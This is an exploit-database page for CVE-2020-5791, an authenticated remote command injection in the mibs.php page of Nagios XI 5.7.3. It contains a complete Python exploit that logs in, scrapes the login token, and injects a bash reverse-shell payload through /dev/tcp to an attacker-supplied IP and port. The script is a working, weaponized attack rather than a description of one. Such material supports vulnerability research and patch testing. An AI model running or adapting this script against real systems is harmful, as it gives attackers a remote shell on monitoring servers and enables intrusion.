Nagios XI 5.7.3 Remote Command Injection

2020.10.29
Credit: Chris Lyne
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated) # Date: 10-27-2020 # Vulnerability Discovery: Chris Lyne # Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ # Software Link: https://www.nagios.com/downloads/nagios-xi/ # Version: Nagios XI 5.7.3 # Tested on: Ubuntu 20.04 # CVE: CVE-2020-5791 #!/usr/bin/python3 import re import requests import sys import urllib.parse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Credit: Chris Lyne for vulnerability discovery and original PoC if len(sys.argv) != 6: print("[~] Usage : ./exploit.py https://NagiosXI_Host/, Username, Password, Attacker IP, Attacker Port") exit() host = sys.argv[1] username = sys.argv[2] password = sys.argv[3] attacker_ip = sys.argv[4] attacker_port = sys.argv[5] login_url = host + "/nagiosxi/login.php" payload = ";/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1';".format(attacker_ip, attacker_port) encoded_payload = urllib.parse.quote_plus(payload) def exploit(): s = requests.Session() login_page = s.get(login_url) nsp = re.findall('var nsp_str = "(.*?)"', login_page.text) res = s.post( login_url, data={ 'nsp': nsp, 'page': 'auth', 'debug': '', 'pageopt': 'login', 'redirect': '/nagiosxi/index.php?', 'username': username, 'password': password, 'loginButton': '' }, verify=False, allow_redirects=True ) injection_url = host + "/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file={0}".format(encoded_payload) res = s.get(injection_url) if res.status_code != 200: print("[~] Failed to connect") if __name__ == '__main__': exploit()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top